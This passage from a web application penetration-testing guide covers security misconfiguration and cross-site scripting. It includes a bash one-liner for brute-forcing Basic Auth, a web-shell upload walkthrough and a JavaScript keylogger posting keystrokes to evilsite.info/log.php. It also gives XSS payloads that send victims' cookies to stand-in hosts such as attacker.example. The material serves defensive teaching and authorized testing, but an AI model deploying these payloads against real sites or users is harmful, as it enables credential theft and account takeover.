The identified software version can matter significantly, as certain versions of software are known to be susceptible to various vulnerabilities. Since nmap is designed as a network mapping tool, it does a great job at finding open ports and associated services, but at layer seven, the application, the best tool available for identifying version information is our browser and accompanying plugins. Before we discuss that in more detail, let's quickly look at the additional HTTP-specific scripts we can execute in conjunction with a typical nmap scan. From a UNIX-based system, the command "ls /usr/share/nmap/scripts/*http* | wc -l" yields a result of over 130 HTTP scripts (a snippet of which is shown in Figure 7.8) ranging from a Joomla brute-force utility to a form fuzzer, and over one dozen CVE vulnerability checks (akin to a vulnerability scanner).

Figure 7.8 Snippet of NSE scripts pertaining to HTTP.

We invoke a given script with the "--script=nameofscript" syntax and can debug with the -d flag when a script does not work as expected. NSE scripts are written in Lua and are human-readable (complete with notes in most cases); it is highly advisable to read at least the description of each script we intend to launch prior to using it, especially in a production environment. It is not uncommon for certain scripts to be regarded as dangerous; they can result in negative consequences (locking out accounts, rendering services unstable, and so forth).
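Putting those pieces together, a single-script invocation with debugging enabled might look like the following sketch; the target address is a placeholder, http-enum is one of the bundled NSE scripts, and the script path assumes a Debian/Kali-style install:

```shell
#!/bin/sh
# Target is a placeholder; only scan hosts that are in scope.
TARGET="10.90.14.27"
SCRIPT="http-enum"

# Read the script's description and notes before launching it, e.g.:
#   less /usr/share/nmap/scripts/http-enum.nse

# Build the invocation, adding -d for debug output when a script misbehaves.
CMD="nmap -sV --script=${SCRIPT} -d ${TARGET}"
echo "$CMD"
# $CMD    # uncomment to execute against an authorized target
```

The command is echoed rather than executed so the sketch is safe to run as-is.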
Where nmap leaves off, our browser and applicable extensions take over in terms of being able to identify software components and versions at layer seven. Browser extensions, or add-ons, are additional software components we can choose to install in our browser to extend its base functionality; we can basically use extensions to customize our browser to meet our needs as penetration testers. All modern browsers have built-in developer tools which are, by most accounts, quite capable from a web developer's perspective, but from an offensive security perspective we typically have different needs and therefore benefit from different tools. Microsoft's Edge browser currently has support for over 220 extensions (from categories such as shopping, social, development, and so on), whereas Google's Chrome browser as well as Firefox have extensions numbering well over 10,000 (Safari and Opera have extensions as well). In addition to a proxy switcher (to easily switch between ZAP, Burp, and None, for example), some useful extensions might include a utility to identify the IP address of the current domain we are browsing to, tamper data, user-agent switcher, web developer, and the like. In addition, we can glean a significant amount of information about a target web application and the technology it uses by using the Wappalyzer extension, which is shown in Figure 7.9.

Figure 7.9 Wappalyzer output as seen from within the browser.

Similar to mobile app permissions, we have the ability to see what information an extension will require to operate prior to installing it, and we want to be careful because the extension is executing in our browser. As we submit sensitive content, the extension has the ability to access this information. Unless we are vetting each extension manually or writing our own, we have to rely on the community and our level of trust with the developer/team responsible for writing the extension. Of course, the same could be said of our browser, and our OS for that matter. It can be interesting to see how fickle any conglomerate of software actually is the deeper we understand its inner workings and trust relationships. With our current understanding of potential security misconfigurations, let's shift our focus to exploitation.

Examples: A development environment is the appropriate place for the development team to make changes to code, test and implement functionality, and utilize verbose error messages to help debug problems. This concept of debugging is common across any development environment; as code is written, bugs are introduced, and without addressing these bugs the code won't work properly in many cases. The web server (IIS/Apache/Nginx) has logging capabilities which can scale up or down to provide more verbose messages, just as the framework used to write the code typically has the capacity to log. In addition, the actual code written by the development team is complete with comments and can contain logic to log errors and other messages when certain conditions are met. In contrast to a development environment, a production environment is not the place to allow error messages to be sent to the user. In fact, when error messages (and similar messages) are enabled in a production environment, this can often lead to an information disclosure vulnerability, which at its root stems from a security misconfiguration flaw. Stack traces, for instance, are a great way for an attacker to learn more about the underlying software, its path of execution, and local user accounts on the system, confirm the OS supporting the application, and more.
What we as attackers need to do to make use of this information is to first trigger an error, an unhandled exception, which will in turn cause the application to expose the error message. We can do this with fuzzing (XSS and injection attacks on IIS servers work great), with the help of Open Source Intelligence (OSINT) such as Google dorks, as well as by interacting with the application in a manner not accounted for by the developers: attacking session state, concurrency/business logic, and in some cases the underlying web server technology. A Google dork identifying such an error would be 'intext:"an unhandled exception was generated" -stackoverflow.com ext:asp "source error:" "stack trace:"', and of course narrowing it down to our target web application(s) with the 'site:' directive will ensure we are only looking for issues with in-scope target systems. The results of running such a query are shown in Figure 7.10.

Figure 7.10 Identified stack trace.

With the output of this stack trace we can hone in on the software version information and parlay this knowledge to conduct a search for CVEs. This is usually the quickest way to exploitation, and while there are many tens of thousands of vulnerabilities identified every year, finding a matching vulnerability specific to our target software with an accompanying and working exploit is rare. What we come across more often is a reference to a CVE for a version of software with little to no detailed information about the flaw and no exploit code. As we saw in the Splunk example earlier, some exploits are rather basic and consist of nothing more than a specially crafted GET
request. However, many other public exploits require very specific conditions to work and can be time-consuming to debug when they fail. With that being said, exploit development is certainly a skill which will serve us well, as we can't always rely on a known exploit being available and reliable. Turning our attention back to cstat, identified in the stack trace, we can try to do some research about the technology, but a quick web search returns something similar (however, nothing exactly referencing this software). Turning to nmap with a command of "nmap -p 1-65535 -A -oA cstatServer 10.90.14.27" will scan all ports with the benefits of the "-A" option previously mentioned while outputting results to three different formats (XML, greppable, and the default) with a base output filename of "cstatServer". This is useful as greppable output is easy to search, whereas the default nmap output is much more detailed. Finally, the XML output is very verbose and actually contains significantly more information than even the default nmap format output. An example of default nmap output is shown in Figure 7.11.

Figure 7.11 nmap output showing cstat running on multiple ports.

The results of the nmap scan show a high port listening with an identified service called cstat and a corresponding version of "0.22". Browsing to this port (as shown in Figure 7.12) shows the administrative interface for what appears to be the CMS (content management system) for the web application running on the default ports of 80 and 443 on the same server.

Figure 7.12 Administrative interface and login.

Since this seems to be unpopular or proprietary/homegrown software (based on the lack of search engine results), known default credentials and vulnerabilities are not going to be published. However, we can proceed to try common credentials manually or launch an automated credential-stuffing attack: looking back at the stack trace (depicted in Figure 7.13) reveals a username which will be useful for this purpose.

Figure 7.13 Username divulged in stack trace.

Submitting the username identified in the stack trace results in a 401 HTTP response and prompts for a Basic Authentication dialog box in our browser. Another security misconfiguration: Basic Authentication has no concept of account lockout.... The exposed username is valid and was configured with a weak password which we were able to guess in just under 10,000 requests. A bash one-liner helped to concatenate the "jsmith" username with a list of common passwords, as we can see in Figure 7.14, whereas Figure 7.15 shows the utilization of the encoded payload.
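A reconstruction of that style of one-liner, expanded for readability, is shown below; the wordlist contents are a stand-in (any common-passwords list works), while the "jsmith" username is the one divulged by the stack trace:

```shell
#!/bin/sh
# Username recovered from the stack trace; the wordlist here is illustrative.
USER="jsmith"
WORDLIST="common-passwords.txt"
printf 'password\nletmein\nsummer2018\n' > "$WORDLIST"

# Emit one base64(user:password) token per line -- the format ZAP's fuzzer
# substitutes into the "Authorization: Basic <token>" request header.
while IFS= read -r pw; do
  printf '%s:%s' "$USER" "$pw" | base64
done < "$WORDLIST" > basic-auth-payloads.txt

wc -l basic-auth-payloads.txt
```

Loading basic-auth-payloads.txt into ZAP's fuzzer as the payload source for the Basic header reproduces the attack; a 200 response among the 401s is the success indicator.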

Figure 7.14 Bash script producing base64 encoded payloads.

Figure 7.15 Configuring ZAP to use payloads.

ZAP's fuzzer was easily set up to use this list of preconfigured base64-encoded credentials, and we can see looking at the results that one request resulted in a 200 response code (our indicator of success, which is visible in Figure 7.16). Figure 7.17 shows the result of gaining administrative access upon successful exploitation.

Figure 7.16 ZAP's success in identifying credentials.

Figure 7.17 Administrative interface of CMS.

With administrative access to the CMS we have the ability to create new pages, moderate content, change permissions, impersonate (as well as create and delete) users, and so on. A straightforward method of gaining shell access in this case is to upload a shell (via the convenient content management feature of the CMS) and then access it from our browser. A collection of ASP web shells exists online, and the minimal code shown in Figure 7.18 will provide an HTML form where we can submit commands (Figure 7.19) to the back-end OS. The results of a successful attack are shown in Figure 7.20.

Figure 7.18 ASP web shell's code.

Figure 7.19 ASP web shell web interface.



Figure 7.20 Results of submitting the command.

An additional security misconfiguration commonplace today is openly permissive cloud storage permissions. Exploiting this is much like exploiting directory browsing; the process and concept are nearly identical. Our first task is identifying the flaw; once we find a public storage container, we simply browse through it to identify sensitive or otherwise useful information. Just as there are Google Dorks for directory browsing, there are Google Dorks to help identify the existence of cloud storage containers. Amazon's Simple Storage Service (S3), Azure's blob storage, and Google's cloud storage all provide users with a way to save/serve static content, and each has a unique URL we can leverage to conduct our reconnaissance. An applicable point of reference for each would be:

https://nameofbucket.storage.googleapis.com/nameofobjectinbucket
https://storage.googleapis.com/nameofbucket/nameofobjectinbucket
https://s3.amazonaws.com/nameofbucket/nameofobjectinbucket
https://nameofbucket.s3.amazonaws.com/nameofobjectinbucket
https://nameofbucket.blob.core.windows.net/nameofobjectinbucket

In addition, a full path may be required to specify the location of the named object in the bucket. The content in the storage container is very much meant to be accessible by someone or some process, hence the familiar URL format; to access a bucket, all we need to know is the name of the bucket. To identify the bucket name we want to hone in on, we can turn back to our search engine of choice and conduct a search with the site: directive to narrow down the results. For example, a query of "site:blob.core.windows.net 'nameoftarget'" should help, and of course additional operators to search for specific document types and keywords will further filter the results to exactly what we are looking for, as is evident in Figure 7.21.

Figure 7.21 Redacted results of search query.

Finding evidence of cloud storage containers and having confidence that the identified container and the contents in the container are public (we can set granular permissions on not just the folder/directory/bucket but also the files/resources within the bucket) takes a bit more effort. While manual efforts are convenient for quickly checking for the existence of the storage containers in a one-off situation, we want to automate this process as our target list grows. While we could create our own solution to handle the process of identifying cloud storage containers for the three major cloud service providers, the tools to do this already exist. Years ago, a fellow security professional released a Ruby script, "bucket_finder.rb", to automate this process for S3 buckets; it requires a wordlist (applicable names of buckets to search for) and supports the ability to download the publicly available files along with logging. This is shown in Figure 7.22.

Figure 7.22 Redacted results of bucket_finder output.


Another option to help with this endeavor is a pair of Burp extensions, AWS Security Checks and Cloud Storage Tester, which do what their respective names imply. A more thorough tool for this example, however, is Espial, as it supports S3 buckets, Azure blobs, and Google's cloud storage implementation. With Espial we need to provide input describing what our target environment is comprised of, such as domain names and IP addresses/keywords. With this input, Espial will execute a multitude of OSINT activities and provide us with the results of its findings, including public cloud storage availability. Figure 7.23 shows Espial's cloud storage bucket information.

Figure 7.23 Selected results of Espial output.


With these results (from either tool) we still need to manually review what was downloaded to see if it is sensitive or presents a risk to the organization we are testing. By default, cloud storage containers/buckets are not open and, in fact, have to be explicitly configured to allow access. The cloud service customer is responsible for securing their own assets, so when we find this type of issue it's another example of a security misconfiguration we can exploit.

Link to hands-on portion: https://tptgtwa.com/owasp6


Root Cause and Conclusion: The cloud service provider is responsible for security of the cloud, while the client of the service is responsible for security in the cloud. This concept goes much past insecure permissions on storage containers, additional examples of which we'll explore later. There are many ways to incorrectly configure a web server, cloud service, or codebase, and as penetration testers we need to be well versed in knowing what to look for, knowing how to identify a given flaw, and how we can use the vulnerability to gain further access to the system. This chapter clarified that the target scope of the penetration test can vary significantly based on the expectations, business, and rules of engagement. Typically, the root cause of security misconfigurations stems from human oversight or poor planning/implementation. Staying up to date with the latest technology is challenging, and it's not uncommon for distinct teams in an organization to move quickly in adopting a new solution to a current problem. The difficulty of securing a given solution stems from limitations in our knowledge, the infancy of the chosen technology, the lack of documentation, employee turnover, and the accumulation of technical debt. All of these things, with the addition of time, make it very hard to secure an environment and subsequently provide opportunities for us to succeed in our endeavors.
Chapter 8

OWASP A7:2017 Cross-Site Scripting (XSS)
Definition: XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface websites, or redirect the user to malicious sites.

Details: At its core, XSS is an attack targeting users of an application, and a largely misunderstood vulnerability. Note XSS being described as both an attack and a vulnerability; this reality adds to the confusion, so let's break it down. XSS is a vulnerability which, when exploited, will cause harm to the client (user) of a web application. Three components are required for a typical XSS attack: a vulnerable web application, an attacker, and a victim (user). The vulnerable web application must exhibit the flaw, the attacker has to find the flaw and craft an attack, and the victim has to be exposed to the attack. XSS comes in two forms, server and client, with overlapping types such as stored, reflected, and variations on DOM-based XSS. Finding an XSS vulnerability is not difficult to do; weaponizing the attack to cause meaningful damage is harder, and finally, crafting a suitable payload and successfully attacking a victim can be challenging. The latter is accurate because during a professional penetration testing engagement it is rare that the client/business will allow us to target users of their production application.
The root cause of an XSS vulnerability resides at the web application layer, typically the code base; unsanitized user input is not adequately encoded prior to being sent to a user or being executed in the DOM. This means we can submit a malicious payload (almost always JavaScript; other scripting languages will also work) to the application, and in turn this payload is parsed/stored or otherwise accepted by the application and subsequently returned to the victim. If this happens immediately (as an HTTP response to our HTTP request), this would be an example of reflected XSS. If the payload is executed later, when we navigate to a specific portion of the application, this would be stored XSS. In the event the XSS attack never gets sent to the server (by utilizing the # character in the URL, for example) or otherwise is delivered and resides strictly in the DOM, this would be an example of DOM-based XSS.
A stored XSS vulnerability allows us to use the persistent storage of the application (typically the back-end database) to host our malicious payload while the web server conveniently serves our attack to users of the application. This type of flaw can be devastating, as everyone visiting the compromised web application will be served our malicious JavaScript from the origin of the vulnerable host. To be clear, we can submit malicious scripts which will subsequently be sent from the server to the client and execute in the client's browser. The same-origin policy (SOP) is not being bypassed, as the source of the script (from the perspective of the browser) is the vulnerable host. This means our malicious script will run in the victim's browser and be able to access the DOM and other resources just as a legitimate/benign script could. The potency of this type of attack is significant, as JavaScript is a powerful programming language, and thus, when we launch a successful attack, we have a lot of control over what occurs in the context of the client's experience, session, and interactions with the vulnerable web application and their browser. We have to think about browser plugins, browser password storage, social engineering attacks, and more, as JavaScript executing in a browser has access to the entirety of the technology exposed by the API; yet another reason why attacking clients is not typically in-scope.
Reflected XSS is not persistent and is typically delivered via a link to the victim, which will in turn be submitted to the vulnerable application as a GET request. This means the attack is a one-time event (or as many times as the link is clicked). In this situation we would find a vulnerable GET parameter, craft an attack, and share the entire URI, complete with the malicious JavaScript, with the victim and hope the bait is taken. The ensuing attack would only execute when the victim clicks the link and submits the GET request, and the malicious script is sent back to the victim's browser with the HTTP response. However, we would have to target individual victims and have them directly interact with our attack string, so this is not always a viable path to exploitation. A DOM-based XSS vulnerability can be stored or reflected.
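The reflected case suggests a simple first test: submit a unique marker payload to a GET parameter and check whether it comes back unencoded in the response. The check itself is demonstrated below offline against a canned response body (a verified finding still requires the payload to actually execute in a browser); the live URL in the comment is a placeholder:

```shell
#!/bin/sh
# Marker payload; anything unique works, but a script tag makes intent obvious.
PAYLOAD='<script>alert(1)</script>'

# Canned body standing in for the server's HTTP response during this offline demo.
RESPONSE='You searched for <script>alert(1)</script> - 0 results'

# -F treats the payload as a fixed string so the angle brackets aren't a regex.
if printf '%s' "$RESPONSE" | grep -qF "$PAYLOAD"; then
  echo "payload reflected unencoded: candidate reflected XSS"
fi

# Against a live, in-scope target this would resemble:
# curl -sk 'https://target.example/search?q=%3Cscript%3Ealert(1)%3C/script%3E' | grep -F "$PAYLOAD"
```

An unencoded reflection is only a candidate; confirming execution in a real browser is what separates a true positive from noise.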
Sometimes it can be hard to clearly explain XSS to a typical business leader; in addition, it can be challenging to convey the risk of XSS. To aid in these efforts, we need to find a path to exploitation which adequately portrays the risk of the finding. To do this we have to conduct research into the extent of the vulnerability and test the payload on ourselves first, to tweak it to perfection. As with previously discussed vulnerabilities, there are limitations to XSS attacks in terms of the impact they will have and our ability to successfully launch the attack. Recall there are three components to XSS (the application, our attack/payload, and the victim), each of which has the potential to reduce our effectiveness; for instance, if our payload is poorly tested, or the attack vector is minimal, or the client simply has script execution disabled in her browser. Even with these limitations we can still oftentimes launch a serious attack with real consequences to the victim. And let's be clear: the user is the victim of the attack, not the application (at least not directly). It is the victim who has the browser which executes our code; the application is merely the conduit for our payload initially.
XSS is the second most common finding in the OWASP top ten list, but it's not the second most impactful due to the limitations already touched on. A common attack scenario for XSS is to hijack a user's session by obtaining the session token and sending it to the attacker. Another common attack with XSS is to alter the contents of the page, modify form actions, enable keystroke logging, or otherwise attempt to gain access to sensitive information. Yet another very important XSS attack is to obtain XSRF tokens to bypass security controls. As with any other vulnerability identified during a penetration test, the risk rating associated with XSS must always be taken in context: How sensitive is the application and what is the level of impact associated with our successful exploitation?
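The session-hijack scenario can be sketched as follows: build the classic cookie-exfiltration payload and plant it in a stored-XSS-vulnerable field. The attacker collection endpoint, the comment parameter, and the target URL are all hypothetical, and the technique only captures cookies that lack the HttpOnly flag:

```shell
#!/bin/sh
# Hypothetical attacker-controlled collection endpoint.
ATTACKER="https://attacker.example/c"

# JavaScript that ships the victim's cookies to the attacker via an image request;
# only cookies without the HttpOnly flag are readable from script.
PAYLOAD="<script>new Image().src='${ATTACKER}?t='+encodeURIComponent(document.cookie);</script>"
echo "$PAYLOAD"

# Planted in a stored-XSS-vulnerable field on an in-scope application:
# curl -sk --data-urlencode "comment=${PAYLOAD}" "https://target.example/comments"
```

When HttpOnly blocks cookie theft, alternatives like the credential-prompt approach described in the Real-World Dialog below remain viable.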
Being such a common vulnerability, there are a multitude of tools designed specifically to identify XSS. However, the complexity of JavaScript (especially minified and purposefully obfuscated, as seen in Figure 8.1) makes the task of reading it, let alone comprehending it, challenging for some vulnerability scanning tools and can lead to false negatives.

Figure 8.1 Minified and obfuscated JavaScript.

There are, however, multiple tools that can reliably find many XSS vulnerabilities, such as our interception proxies and commercial web application vulnerability scanning tools when configured properly. We'll discuss several of these tools and applicable attack scenarios later in this chapter.

Real-World Dialog: I was introduced to the Browser Exploitation Framework (BeEF) many years ago, and have since been able to use it during several web application penetration tests. During one particular test I crafted a payload to launch BeEF and promptly hooked several victims. The vulnerable web application had the HttpOnly flag set on session cookies, so an outright session hijack via cookie theft was not likely. In reviewing the various plugins at my disposal within the BeEF GUI, I noticed a particular option for dumping stored credentials. Executing this module enabled me to gather the usernames and passwords (among other artifacts) from the compromised browser, but they all referenced other web applications and out-of-scope systems.
In this situation I had to make a call, literally, and spoke with my primary point of contact at the organization that hired my company to conduct the penetration test. Client-side attacks (such as using BeEF to attack users) were in-scope, but using user credentials to log in to personal webmail accounts, for example (for reconnaissance or social engineering attacks), was a gray area. While this topic was discussed and accounted for in the rules of engagement, prior to taking the next step a phone call was warranted. My point of contact denied the request to use the obtained credentials, so I focused my attention on other modules, such as a custom dialog box. I used BeEF to produce a prompt asking the user to resubmit his credentials to the application ("Your session is about to expire...") and was able to obtain his username and password, even better than his cookie!
With this information I was able to simply log in to the application as this user, which provided me with an elevated level of privilege. Additional functionality was enabled with this access, and a subsequently identified injection vulnerability eventually provided shell access to the system. From XSS to SQLi to shell; not an entirely uncommon approach, as XSS alone can rarely be parlayed into injection or other direct server-side exploitation.

How to Exploit: We exploit XSS with specifically crafted payloads depending on the attack surface of the application. For instance, the size of the input box (the length of characters it supports) will play a pivotal role as we devise our payload; mainly, how large our payload can be. However, XSS flaws are not by any means limited to input boxes. Determining whether the vulnerability is server- or client-based also dictates our avenue of attack, as does our ability to store the attack, reflect it, or attack the DOM. The most potent XSS attacks are stored server-side, as our payload will reside in the vulnerable application's database and potentially be served to many victims. In contrast, a server-side reflected attack typically requires us to choose the target victim(s), perhaps with a phishing campaign. For this reason, we ideally want to leverage the more impactful vulnerability but still focus on identifying all of the application's XSS vulnerabilities. Recall that our objective during a penetration test is to identify flaws, exploit the flaws, and arrive at a clear, evidence-based risk rating for each finding. We provide this information to business leaders so they can remediate the findings accordingly, or at least have the information to make an informed decision as it aligns with their risk tolerance.
Conducting a thorough review for XSS flaws hinges on the quality of our mapping and the tools we use to aid in our efforts. It's not usually feasible to manually insert an XSS string into every injection point and determine whether the payload executes. On large applications this approach would fail due to time constraints, and on an application of any size it would simply be too inefficient. Thus, leveraging a tool is the best approach; we do, however, need to know how XSS tools work so we can quickly vet their reports, eliminate false positives, and home in on the higher-risk true positives (as well as tune the tools to yield the best results). To review the output
124 The Penetration Tester's Guide to Web Applications

of the report, most XSS injection tools will provide a PDF, HTML, or text-based output file consisting of the attack payload and the resulting response from the server. The problem with results delivered this way is that we can't confirm an XSS flaw exists unless the payload executes in a browser (any browser). Two important takeaways from that last sentence are the concept of the browser executing the code and the mention of "any browser." First, many web application scanning tools will report the existence of XSS flaws, provide the applicable HTTP request (with the payload), show the resulting HTTP response (also with the payload), and conclude the application/parameter is vulnerable to XSS based on this result. We then have to take this information and duplicate the finding in our browser to ensure it's not a false positive; just because the payload is present in both the request and response doesn't mean it will execute in the browser. This leads to the next point: the browser is where the payload executes... but what if the browser is actively blocking the execution of the payload? Does this mean the application is not vulnerable? The answer is no. Different browsers have different JavaScript engines, APIs, supported features, and ways of parsing code, meaning a given payload may execute in the Midori and Maxthon web browsers, but not Chrome and Edge. Furthermore, when an application sets the X-XSS-Protection security header, compatible browsers enable limited built-in protections against some reflected XSS attacks. In these cases the underlying application is still vulnerable; however, we need to show the impact, and when only a small number of actual users could be affected by the flaw, we have to take that into consideration when calculating the risk ranking of the finding.
In effect, when we use tools to help identify XSS flaws, we still need to manually confirm the finding and, more importantly, weaponize a payload. The string "<script>alert("xss");</script>" is very often used to test for XSS, and in turn makes its way into penetration testing reports as evidence, an example of which is shown in Figure 8.2.

Figure 8.2 Common XSS alert dialog.


While this string and the resulting execution of code are useful to quickly confirm the existence of XSS, we are conducting a penetration test, not a vulnerability scan, and in doing so we need to show the potential for harm, not just the existence of the flaw. In short, we need to modify the payload to achieve a more potent result. To do so we need a deep understanding of JavaScript and HTML, as these two languages are what the web is essentially built upon, and our end goal of manipulating the DOM (what the user experiences) is contingent on our crafted code.
Some XSS attacks are straightforward, such as stealing cookies. To do this we need to set up an internet-facing server to listen for and log requests, and simultaneously have our payload execute in a victim's browser. The XSS payload could consist of a GET request to our attacker-controlled IP/domain, appending the document.cookie property to dump all of the cookies as part of the HTTP GET request pointed at our server. The attack could be delivered via an email as part of a phishing campaign, as seen in Figure 8.3.

Figure 8.3 Phishing email with XSS link.



Hovering over the link shows a URL of (separated by multiple lines for read-
ability):

https://evilsite.info/search?query=<script>document.location='
https://cookiecapture.example.com/cookiestealer.php?
cookie='+escape(document.cookie)</script>

The evilsite.info domain in this example is a vulnerable website, with the XSS vulnerability located in the "search" page's "query" parameter. The link in the phishing email exploits this vulnerable parameter with a JavaScript payload instructing the browser to make a new HTTP request to the appropriately named cookiecapture.example.com domain. Included in the HTTP request is a reference to a PHP page (cookiestealer.php), a parameter (cookie), and the escaped document.cookie property, which will be populated with all the cookies the victim has stored in her browser for evilsite.info. When the victim clicks the link in the email, the browser handles the HTTP request and, in doing so, submits the attacker's malicious JavaScript (the XSS payload) to evilsite.info, to which the victim is hypothetically logged in at the time. The malicious request includes a component to automatically make a new HTTP request, which sends the victim's cookies to the attacker: any request to cookiecapture.example.com is logged, and most importantly in this example, the full URI is logged, which includes the victim's cookie. Viewing the Apache logs on cookiecapture.example.com shows all of the logged requests and captured cookies. With that, let's move on to examples of how to execute such an attack and further weaponize XSS.
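The phishing link described above can be assembled programmatically. The sketch below (in JavaScript, since that is the payload language) URL-encodes the script payload so it survives as a single GET parameter; the domain and parameter names mirror the chapter's placeholder examples and are not real infrastructure.

```javascript
// Sketch: build the cookie-stealing phishing link described above.
// All domains/paths are the chapter's placeholder examples.
function buildPhishingLink(vulnSearchUrl, captureUrl) {
  var payload =
    "<script>document.location='" + captureUrl +
    "?cookie='+escape(document.cookie)</script>";
  // Encode the payload so the browser treats it as one "query" value.
  return vulnSearchUrl + "?query=" + encodeURIComponent(payload);
}

var link = buildPhishingLink(
  "https://evilsite.info/search",
  "https://cookiecapture.example.com/cookiestealer.php"
);
// The raw <script> tag never appears unencoded in the final link.
```

Decoding the query parameter with decodeURIComponent() recovers the exact payload shown earlier, which the vulnerable search page would reflect into its response.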

Examples: Let's begin by introducing some tools to help identify potential


XSS vulnerabilities. The first is XSSer, a Python-based tool we can run from the command line or GUI to help find vulnerabilities. While seemingly robust, the tool has its flaws, as not all features are fully implemented and bugs emerge during use. However, it is useful as a baseline tool to help see how some XSS attacks work. On the CLI we can invoke it as we would invoke sqlmap, such as by specifying a target URL, custom user-agent, and verbosity. This can be seen in Figure 8.4.

Figure 8.4 XSSer Command Line Interface Syntax.

When running, we can view the real-time logs depicting what the tool is doing (which URI it is attacking/crawling, the payload it is sending, various headers) and see if/when it identifies a vulnerability. Outputting the results of the testing to a file enables a quick grep (seen in Figure 8.5) to identify the attack strings it is sending: cat LOGS | grep 'attack with'.

Figure 8.5 XSSer Logs showing submitted payloads.

The GUI provides a wizard, custom settings, and a nice feature of building
the CLI command based on our preferences in the GUI. We can see this once
we specify our settings and click the "Aim" button as seen in Figure 8.6.

Figure 8.6 XSSer GUI output.

Once vulnerabilities are identified with this tool, we will want to manually provide a payload to exploit the flaw. A great way to do this, and to sidestep character restrictions on the vulnerable parameter's input, is by specifying our own remote code. By doing so we can pull in an entire library, thousands of lines of code, with one XSS command. This will in turn inject the full exploit into our victim's browser; we do this by specifying the path to our hosted payload. Keep in mind we do need to host the malicious JavaScript somewhere on the web for this to work, yet another reason for a VPS or cloud-hosted server to be included as part of our standard toolset. Alternatively, in a lab environment, we could simply host the script locally to simulate the same concept. However, know that in a real-world scenario we will need to host the malicious code on an HTTPS-enabled website with a valid TLS certificate to ensure the browser loads the content (as opposed to throwing an untrusted-content error and refusing to load the JavaScript). Let's explore injecting a keystroke logger as our payload.

In this example, as with any real-world XSS scenario, there is a vulnerable application, an attacker, and a victim user. The application takes user input via the message and name parameters, stores the input in a database, and later serves it to other users requesting a given page. First, we need to identify the flaw, and to do this we execute a scan with XSSer in a fashion similar to the previous example. Once it finds a vulnerable parameter/request which we can validate, we want to work on crafting our keystroke logging payload and subsequently injecting it. Doing this successfully requires some initial setup: not just the proper syntax for a working keystroke logger, but also the configuration of the hosting/logging server. Let's work on the code to log keystrokes; we'll name the file "k.js". This JavaScript will define a new function leveraging the onkeypress event, which fires every time a key is pressed. Once a key is pressed, an XMLHttpRequest will submit the value of the pressed key to our logging server, "evilsite.info/log.php". This server is also the hosting server, as evilsite.info has the "k.js" file hosted at "/var/www/html/k.js". Figure 8.7 shows the applicable code.

Figure 8.7 Keystroke logging JavaScript.
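Since the figure itself may be hard to read, here is a hypothetical reconstruction of what k.js could look like based on the description above (an onkeypress handler POSTing a "k" parameter to log.php via XMLHttpRequest). This is a sketch under those assumptions, not the book's exact code.

```javascript
// k.js — hypothetical keystroke logger reconstructed from the text.
// The endpoint and parameter name ("k") are the chapter's examples.
var LOG_URL = "https://evilsite.info/log.php";

// Pure helper: build the urlencoded form body for one keystroke.
function logBody(key) {
  return "k=" + encodeURIComponent(key);
}

// Ship one keystroke to the logging server.
function sendKey(key) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", LOG_URL, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(logBody(key));
}

// Fires for every key pressed anywhere on the exploited page.
if (typeof document !== "undefined") {
  document.onkeypress = function (e) {
    sendKey(String.fromCharCode(e.which || e.keyCode));
  };
}
```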

We inject this malicious code into the vulnerable application by using the "src" attribute in our payload and defining the location where the script is hosted. To be clear, the vulnerable website has a form (as depicted in Figure 8.8), we are submitting a script into the form, and subsequently the script will be included as part of the page the victim visits at a later time.

Figure 8.8 Vulnerable form.

Now when the victim user browses to this same web application and sub-
mits their name and message, the resulting page loads in their browser and
includes our malicious JavaScript. This JavaScript will proceed to log every
subsequent keystroke made while on the exploited page. While the payload
is persistent (stored in the back-end database and served to unsuspecting
visitors), it only executes on this one page on this one web application until
a victim browses somewhere else or closes the browser. The payload works
well in this context and we can see in Burp that each time a key is pressed, a
POST request is being sent to evilsite.info/log.php (Figure 8.9) with a simple
payload of the parameter "k" and the value of the key which was pressed.

Figure 8.9 Each keystroke creates a POST request.

At this point we can see the keystroke logging JavaScript is working as intended, and now we need to focus on logging the results. Using PHP (or almost any language we want), we can write a few lines of code to handle the POST request, open and append the results to a file, and account for potential issues. Note that SELinux may be a hurdle, and the "keylog.txt" file referenced in Figure 8.10 will need to be writable by PHP.

Figure 8.10 PHP code handling the logging of each keystroke.

Looking at the results of the exploit we can see the payload submitted by
one of the victims.

Figure 8.11 Final results of logged keystrokes.


Next let's reexamine the details of launching a credential-stealing attack. Earlier in this chapter we discussed one of the more common XSS attacks, which is to steal a cookie. While simply enabling the HttpOnly flag on a cookie prevents any JavaScript from reading its contents, it is very common for this flag not to be set, even on a session token. Because of this, there is value in detailing how to craft this exploit. Once the vulnerable parameter has been identified, we have to understand whether the vulnerability manifests as stored or reflected (or DOM-based). While the attack will be similar in both situations, the delivery will be different. Recall that the reflected attack requires the payload (the entire attack string) to be sent to the victim via a side channel such as email. The specifics/code to make this work consist of the XSS attack sent from the attacker (using email) to the victim (opened using an email client and sent using a browser) to the web application (from the victim's browser). This time, by using the Python 3 tool XSStrike, invoked from the command line as python3.6 xsstrike.py -u "http://example.com/xss.aspx?name=name", we are able to identify several reflected vulnerabilities, as we can see in Figure 8.12.

Figure 8.12 XSStrike identifying XSS vulnerabilities.



With this information we can proceed to manually verify the results and craft a suitable payload. The fact that the vulnerability is a reflected GET request makes our job easier, as we can utilize the address bar in our browser to tweak the payload and immediately see the results. This also bodes well, as we need the vulnerability to be exploitable via the GET method for our planned email delivery mechanism to work. In the event the vulnerability is found via a POST request, we can often simply convert the POST request to a GET request by examining the contents of the POST payload and reconstructing them as GET parameters. (As an aside, when we can convert a POST request to a GET request, this is called a method interchange vulnerability.) In order to steal a victim's cookies, our payload can consist of a reference to the vulnerable web application and a redirect request appending all of the victim's available cookies for the domain as a string sent to our attacker-controlled web server. To test the code, we can submit a request with an alert box showing the cookies for the domain (as shown in Figure 8.13) of the vulnerable web application: <script>alert(document.cookie);</script>.

Figure 8.13 Alert box showing the value of the cookie.

We'll add onto this with the redirect code to tell the victim's browser to make
a new HTTP request to our server, but in the request, include the cookies the
browser has saved for the current web application it is visiting. Once again, to
be clear, the victim user browsing to evilsite.info has a session token/cookie
(PHPSESSID) denoting that the user is logged into the evilsite.info web ap-
plication. When the victim receives our crafted XSS attack via email, their
browser will load the request to evilsite.info and make a new request to a
